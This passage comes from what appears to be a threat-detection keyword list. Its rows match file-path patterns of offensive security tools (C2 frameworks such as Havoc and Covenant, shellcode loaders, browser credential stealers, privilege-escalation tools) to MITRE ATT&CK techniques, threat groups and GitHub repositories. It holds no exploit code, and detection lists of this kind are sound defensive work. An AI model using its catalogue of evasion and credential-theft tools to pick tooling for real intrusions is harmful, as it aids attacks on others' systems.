Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/GreatSCT/*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/GreatSCT/GreatSCT*,offensive_tool_keyword,GreatSCT,GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker,T1027 - T1055 - T1566 - T1218,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/greatsct-output*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/Group3r.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/Grouper2.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/GruntHTTP.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/gtfobins.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/gtfobins.py*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*/guervild/BOFs*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/guessed_emails.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - 
T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*/gyaansastra/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0008,N/A,N/A,Exploitation tools,https://github.com/gyaansastra/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-20T15:46:04Z,2022-03-09T15:44:58Z -*/GzipB64.exe*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*/h8mail/*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,1,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*/HackBrowserData*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*/hackerid.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/hackingtool.git*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 
T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*/Hack-Tools.git*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*/Hades.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/hades.git*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*/HadesLdr.git*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*/hades-main.zip*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*/hadoop-datanode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-jobtracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-secondary-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-tasktracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Hak5.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/hakrawler.git*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*/hancitor.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/HandleKatz_BOF*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/HandleKatz_BOF,1,1,N/A,10,10,93,17,2021-10-12T21:38:02Z,2021-10-12T18:45:06Z -*/HarmJ0y*,offensive_tool_keyword,Github Username,Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/HarmJ0y,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/HaryyUser.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/hashcat*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/hashdump_dc*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/Hashi0x/*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,1,N/A,N/A,,N/A,,, -*/hashview.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*/havex.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/Havoc.cpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc.qss*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z 
-*/Havoc.rc*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc/data/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc/main/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/HavocFramework/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/HavocImages/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/havoc-py/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/hbase-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hbase-region-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hddtemp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hDendron.cs*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/HeapCrypt.git*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*/HellsGate.git*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*/Heroinn/*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*/hid_inject.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/hid_sniff.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/HiddenDesktop.git*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
